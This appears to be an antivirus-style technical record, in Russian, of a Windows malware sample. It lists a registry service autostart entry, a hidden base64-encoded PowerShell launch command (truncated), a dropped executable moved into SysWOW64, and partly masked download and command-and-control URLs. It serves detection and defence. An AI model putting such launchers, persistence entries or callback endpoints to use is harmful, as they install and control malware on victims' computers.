Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\renderdiv] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\renderdiv] 'ImagePath' = '"%WINDIR%\SysWOW64\renderdiv.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABCAGgAbAByAHQAdQBxAGoAcAB5AD0AJwBJAGEAcgBqAHoAZwBhAHAAeABpAHQAaABwACcAOwAkAEsAYwBxAG4AegBwAGMAbABnAGUAIAA9ACAAJwAyADUAMQAnADsAJABYAGQAdgBnAHAAZABmAHoAdwBlAGQAPQAnAFI...
- %HOMEPATH%\251.exe
- %HOMEPATH%\251.exe в %WINDIR%\syswow64\renderdiv.exe
- http://su#####lsupplies.com/wp-content/63689260/
- http://17#.##0.31.177:8080/report/arizona/ via 17#.#30.31.177
- DNS ASK su#####lsupplies.com
- '%HOMEPATH%\251.exe'
- '%WINDIR%\syswow64\renderdiv.exe'